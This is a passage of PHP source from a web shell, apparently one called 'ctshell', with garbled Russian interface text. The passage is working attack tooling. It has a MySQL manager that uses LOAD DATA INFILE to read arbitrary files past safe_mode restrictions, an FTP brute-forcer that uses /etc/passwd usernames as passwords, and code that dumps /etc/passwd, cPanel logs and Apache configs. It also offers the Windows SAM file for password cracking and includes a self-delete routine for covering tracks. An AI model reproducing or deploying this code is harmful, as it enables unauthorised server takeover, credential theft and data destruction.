  720. $mssql_on = @function_exists('mssql_connect');
  721. if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  722. echo "<br>";
  723. echo "PostgreSQL: <b>";
  724. $pg_on = @function_exists('pg_connect');
  725. if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  726. echo "<br>";
  727. echo "Oracle: <b>";
  728. $ora_on = @function_exists('ocilogon');
  729. if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  730. ?>
  731. <?php
  732. $free = diskfreespace($d);
  733. if (!$free) {$free = 0;}
  734. $all = disk_total_space($d);
  735. if (!$all) {$all = 0;}
  736. $used = $all-$free;
  737. $used_percent = round(100/($all/$free),2);
  738. echo "<br><b>Ñâîáîäíûé ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
  739. ?>
  740. </font>
  741. </div>
  742. <?
  743. if ($win)
  744. {
  745. ?>
  746. - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ðàñêðûòü">Äèñêè</a></font>
  747. <?
  748. }
  749. ?>
  750. <div id="Drive" style="display: none">
  751. <?
  752. $letters = "";
  753. if ($win)
  754. {
  755. $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
  756. $v = explode("/",$d);
  757. $v = $v[0];
  758. foreach ($abc as $letter)
  759. {
  760. if (is_dir($letter.":/"))
  761. {
  762. if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
  763. else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
  764. }
  765. }
  766. if (!empty($letters)) {echo "<b>".$letters;}
  767. }
  768. ?>
  769. </div>
  770. </td><td width=1>
  771. <font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
  772. </td></tr></table>
  773. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  774. <tr class=tr1><td>
  775. <center>
  776. <?
  777. if (count($quicklaunch) > 0)
  778. {
  779. foreach($quicklaunch as $item)
  780. {
  781. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  782. $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
  783. echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
  784. }
  785. }
  786. ?>
  787. </center>
  788. </td></tr></table>
  789. <?php
  790. if ((!empty($donated_html)) and (in_array($act,$donated_act)))
  791. {
  792. ?>
  793. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
  794. <?php
  795. }
  796. ?>
  797. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
  798. if ($act == "") {$act = $dspact = "ls";}
  799. if ($act == "sql")
  800. {
  801. $sql_surl = $sul."act=sql";
  802. if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  803. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  804. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  805. if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  806. if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  807. $sql_surl .= "&";
  808. ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
  809. if ($sql_server)
  810. {
  811. $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  812. $err = mysql_error();
  813. @mysql_select_db($sql_db,$sql_sock);
  814. if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
  815. }
  816. else {$sql_sock = false;}
  817. echo "<b>Ìåíåäæåð SQL:</b><br>";
  818. if (!$sql_sock)
  819. {
  820. if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
  821. else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  822. }
  823. else
  824. {
  825. $sqlquicklaunch = array();
  826. $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  827. if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
  828. else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
  829. $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  830. $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  831. $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  832. $sqlquicklaunch[] = array("Logout",$sul."act=sql");
  833. echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  834. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  835. echo "</center>";
  836. }
  837. echo "</td></tr><tr>";
  838. if (!$sql_sock) {?><td class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
  839. <li>Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïðîöåññà. </li>
  840. <li>Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost </li>
  841. <li>Åñëè ïîðò ÿâëÿåòñÿ ïóñòûì, ïîðò - 3306 (íåïëàòåæ)</li></td>
  842. <td class=td2 width="90%" height="1" valign="top">
  843. <TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
  844. <td class=td2>&nbsp;<b><font size=2 color=#000000>Çàïîëíèòå ôîðìó:</font></b><table><tr class=tr2><td class=td2>Èìÿ:</td>
  845. <td class=td2 align=right>Ïàðîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
  846. <td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td class=td2 align=right>
  847. <input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>Õîñò:</td>
  848. <td class=td2>Ïîðò:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
  849. <td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Ñîåäèíèòåñü"></td></tr><tr>
  850. <td class=td2></td></tr></form></table></td><?php }
  851. else
  852. {
  853. if (!empty($sql_db))
  854. {
  855. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  856. $result = mysql_list_tables($sql_db);
  857. if (!$result) {echo mysql_error();}
  858. else
  859. {
  860. echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  861. $c = 0;
  862. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
  863. "; mysql_free_result($count); $c++;}
  864. if (!$c) {echo "No tables found in database.";}
  865. }
  866. }
  867. else
  868. {
  869. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  870. $result = mysql_list_dbs($sql_sock);
  871. if (!$result) {echo mysql_error();}
  872. else
  873. {
  874. ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  875. echo "<option value=\"\">Databases (...)</option>
  876. ";
  877. $c = 0;
  878. while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
  879. "; $c++;}
  880. }
  881. ?></select><hr size="1" noshade>Ïîæàëóéñòà, âûáåðèòå áàçó äàííûõ<hr size="1" noshade><input type="submit" value="Go"></form><?php
  882. }
  883. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  884. if ($sql_db)
  885. {
  886. echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
  887. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  888. echo "</b></center>";
  889. $acts = array("","dump");
  890. if ($sql_act == "query")
  891. {
  892. echo "<hr size=\"1\" noshade>";
  893. if ($submit)
  894. {
  895. if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  896. }
  897. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  898. if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
  899. }
  900. if (in_array($sql_act,$acts))
  901. {
  902. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  903. if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  904. if ($sql_act == "newtpl")
  905. {
  906. echo "<b>";
  907. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  908. }
  909. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  910. }
  911. elseif ($sql_act == "dump")
  912. {
  913. $set = array();
  914. $set["sock"] = $sql_sock;
  915. $set["db"] = $sql_db;
  916. $dump_out = "print";
  917. if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
  918. elseif ($dump_out == "download")
  919. {
  920. @ob_clean();
  921. header("Content-type: ctshell");
  922. header("Content-disposition: attachment; filename=\"".$f."\";");
  923. $set["print"] = 1;
  924. $set["nl2br"] = 1;
  925. }
  926. $set["file"] = $dump_file;
  927. $set["add_drop"] = true;
  928. $ret = mysql_dump($set);
  929. if ($dump_out == "download") {exit;}
  930. }
  931. else
  932. {
  933. $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
  934. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
  935. echo "<tr>";
  936. echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
  937. echo "<td><center><b>Table</b></center></td>";
  938. echo "<td><b>Rows</b></td>";
  939. echo "<td><b>Type</b></td>";
  940. echo "<td><b>Created</b></td>";
  941. echo "<td><b>Modified</b></td>";
  942. echo "<td><b>Size</b></td>";
  943. echo "<td><b>Action</b></td>";
  944. echo "</tr>";
  945. $i = 0;
  946. $tsize = $trows = 0;
  947. while ($row = mysql_fetch_array($result, MYSQL_NUM))
  948. {
  949. $tsize += $row["5"];
  950. $trows += $row["5"];
  951. $size = view_size($row["5"]);
  952. echo "<tr>";
  953. echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
  954. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
  955. echo "<td>".$row[3]."</td>";
  956. echo "<td>".$row[1]."</td>";
  957. echo "<td>".$row[10]."</td>";
  958. echo "<td>".$row[11]."</td>";
  959. echo "<td>".$size."</td>";
  960. echo "<td>
  961. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
  962. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
  963. <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
  964. </td>";
  965. echo "</tr>";
  966. $i++;
  967. }
  968. echo "<tr bgcolor=\"000000\">";
  969. echo "<td><center><b>»</b></center></td>";
  970. echo "<td><center><b>".$i." table(s)</b></center></td>";
  971. echo "<td><b>".$trows."</b></td>";
  972. echo "<td>".$row[1]."</td>";
  973. echo "<td>".$row[10]."</td>";
  974. echo "<td>".$row[11]."</td>";
  975. echo "<td><b>".view_size($tsize)."</b></td>";
  976. echo "<td></td>";
  977. echo "</tr>";
  978. echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
  979. <option>With selected:</option>
  980. <option value=\"drop\" >Drop</option>
  981. <option value=\"empty\" >Empty</option>
  982. <option value=\"chk\">Check table</option>
  983. <option value=\"Optimize table\">Optimize table</option>
  984. <option value=\"Repair table\">Repair table</option>
  985. <option value=\"Analyze table\">Analyze table</option>
  986. </select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
  987. mysql_free_result($result);
  988. }
  989. }
  990. }
  991. else
  992. {
  993. $acts = array("","newdb","serverstat","servervars","processes","getfile");
  994. if (in_array($sql_act,$acts))
  995. {
  996. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Ñîçäàéòå íîâûé Áàçó:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Ñîçäàòü"></form></td><td width="30%" height="1"><b>Ïðèñìîòðåòü Ôàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Âçÿòü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  997. }
  998. if (!empty($sql_act))
  999. {
  1000. echo "<hr size=\"1\" noshade>";
  1001. if ($sql_act == "newdb")
  1002. {
  1003. echo "<b>";
  1004. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1005. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  1006. }
  1007. if ($sql_act == "serverstatus")
  1008. {
  1009. $result = mysql_query("SHOW STATUS", $sql_sock);
  1010. echo "<center><b>Server-status variables:</b><br><br>";
  1011. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  1012. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1013. echo "</table></center>";
  1014. mysql_free_result($result);
  1015. }
  1016. if ($sql_act == "servervars")
  1017. {
  1018. $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1019. echo "<center><b>Server variables:</b><br><br>";
  1020. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  1021. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1022. echo "</table>";
  1023. mysql_free_result($result);
  1024. }
  1025. if ($sql_act == "processes")
  1026. {
  1027. if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1028. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1029. echo "<center><b>Ïðîöåññû:</b><br><br>";
  1030. echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1031. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1032. echo "</table>";
  1033. mysql_free_result($result);
  1034. }
  1035. elseif (($sql_act == "getfile"))
  1036. {
  1037. if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
  1038. elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
  1039. elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
  1040. else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
  1041. else
  1042. {
  1043. for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1044. $f = "";
  1045. while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
  1046. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
  1047. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
  1048. }
  1049. mysql_free_result($result);
  1050. if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
  1051. }
  1052. }
  1053. }
  1054. }
  1055. }
  1056. echo "</tr></table></table>";
  1057. }
  1058. if ($act == "mkdir")
  1059. {
  1060. if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
  1061. echo "<br><br>";
  1062. $act = $dspact = "ls";
  1063. }
  1064. if ($act == "ftpquickbrute")
  1065. {
  1066. echo "<b>Ftp Quick brute:</b><br>";
  1067. if ($win) {echo "This functions not work in Windows!<br><br>";}
  1068. else
  1069. {
  1070. function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1071. {
  1072. if ($fqb_onlywithsh)
  1073. {
  1074. if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
  1075. else {$true = true;}
  1076. }
  1077. else {$true = true;}
  1078. if ($true)
  1079. {
  1080. $sock = @ftp_connect($host,$port,$timeout);
  1081. if (@ftp_login($sock,$login,$pass))
  1082. {
  1083. echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1084. ob_flush();
  1085. return true;
  1086. }
  1087. }
  1088. }
  1089. if (!empty($submit))
  1090. {
  1091. if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1092. $fp = fopen("/etc/passwd","r");
  1093. if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1094. else
  1095. {
  1096. ob_flush();
  1097. $i = $success = 0;
  1098. $ftpquick_st = getmicrotime();
  1099. while(!feof($fp))
  1100. {
  1101. $str = explode(":",fgets($fp,2048));
  1102. if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1103. {
  1104. $success++;
  1105. }
  1106. if ($i > $fqb_lenght) {break;}
  1107. $i++;
  1108. }
  1109. if ($success == 0) {echo "No success. connections!";}
  1110. $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1111. echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
  1112. }
  1113. }
  1114. else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
  1115. }
  1116. }
  1117. if ($act == "lsa")
  1118. {
  1119. echo "<center><b>Èíôîðìàöèÿ áåçîïàñíîñòè ñåðâåðà:</b></center>";
  1120. echo "<b>Ïðîãðàììíîå îáåñïå÷åíèå:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
  1121. echo "<b>Áåçîïàñíîñòü: ".$hsafemode."</b><br>";
  1122. echo "<b>Îòêðûòûé îñíîâíîé äèðåêòîð: ".$hopenbasedir."</b><br>";
  1123. if (!$win)
  1124. {
  1125. if ($nixpasswd)
  1126. {
  1127. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1128. $num = $nixpasswd + $nixpwdperpage;
  1129. echo "<b>*nix /etc/passwd:</b><br>";
  1130. $i = $nixpasswd;
  1131. while ($i < $num)
  1132. {
  1133. $uid = posix_getpwuid($i);
  1134. if ($uid) {echo join(":",$uid)."<br>";}
  1135. $i++;
  1136. }
  1137. }
  1138. else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1139. if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1140. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1141. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1142. if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1143. }
  1144. else
  1145. {
  1146. $v = $_SERVER["WINDIR"]."\repair\sam";
  1147. if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
  1148. else {echo "<b><font color=\"green\">Âû ìîæåòå âçëîìàòü winnt ïàðîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Ñêà÷àòü</b></u></a>, c èñïîëüçîâàíèå lcp.crack+.</font></b><br>";}
  1149. }
  1150. }
  1151. if ($act == "mkfile")
  1152. {
  1153. if ($mkfile != $d)
  1154. {
  1155. if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1156. elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1157. else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
  1158. }
  1159. else {$act = $dspact = "ls";}
  1160. }
  1161. if ($act == "fsbuff")
  1162. {
  1163. $arr_copy = $sess_data["copy"];
  1164. $arr_cut = $sess_data["cut"];
  1165. $arr = array_merge($arr_copy,$arr_cut);
  1166. if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1167. else
  1168. {
  1169. echo "<b>File-System buffer</b><br><br>";
  1170. $ls_arr = $arr;
  1171. $disp_fullpath = true;
  1172. $act = "ls";
  1173. }
  1174. }
  1175. if ($act == "selfremove")
  1176. {
  1177. if (!empty($submit))
  1178. {
  1179. if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
  1180. else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1181. }
  1182. else
  1183. {
  1184. $v = array();
  1185. for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
  1186. $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
  1187. shuffle($v);
